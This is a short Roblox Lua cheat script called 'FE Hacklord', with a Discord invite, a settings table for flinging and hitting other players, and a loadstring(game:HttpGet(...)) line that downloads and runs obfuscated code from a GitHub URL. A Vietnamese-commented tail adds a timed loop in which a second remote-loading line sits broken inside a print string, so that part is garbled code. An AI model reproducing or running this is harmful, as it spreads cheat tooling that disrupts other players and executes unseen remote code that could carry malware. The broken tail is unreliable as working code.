--[[
	FE Hacklord (omg it's the guy from forsaken!!!)
	
	https://discord.gg/bjTxKxjJVc
	Join 24-HOURS for more scripts (in the future)
]]--

--Settings
ScriptSettings = {
	LegacyMode = false, --Set to true if you want to use the old version
	InstaKill = false, --If you want to fling people quickly, set this to true
	Finisher = true, --Play finisher animation
	Introduction = true,  --Play intro animation
	MuteSongs = false, --self-explanatory
	VisibleHitbox = true; --self-explanatory
	Hitmarker = true; --Shows damage dealt
	HitSoundId = "rbxassetid://1129547534" --Custom hit sound
}

--Loadstring
loadstring(game:HttpGet("https://raw.githubusercontent.com/BloxinStud10/24-Hours/refs/heads/main/Obfuscations/Hacklord.luau"))()

-- Thời gian chờ trước khi kích hoạt (giây)
local delayTime = 10  

print("⏳ Sẽ kích hoạt sau " .. delayTime .. " giây...")
task.wait(delayTime)

-- 💥 Thực hiện hành động sau khi hết thời gian
print("🔥 Script đã được kích hoạt!")

-- Ví dụ: hành động bạn muốn chạy ở đây
-- (bạn có thể thay phần này bằng code thật của mình)
for i = 1, 5 do
    print("
loadstring(game:HttpGet("https://raw.githubusercontent.com/x5oz6/Game/refs/heads/main/Hacklord"))()" .. i)
    task.wait(10)
end

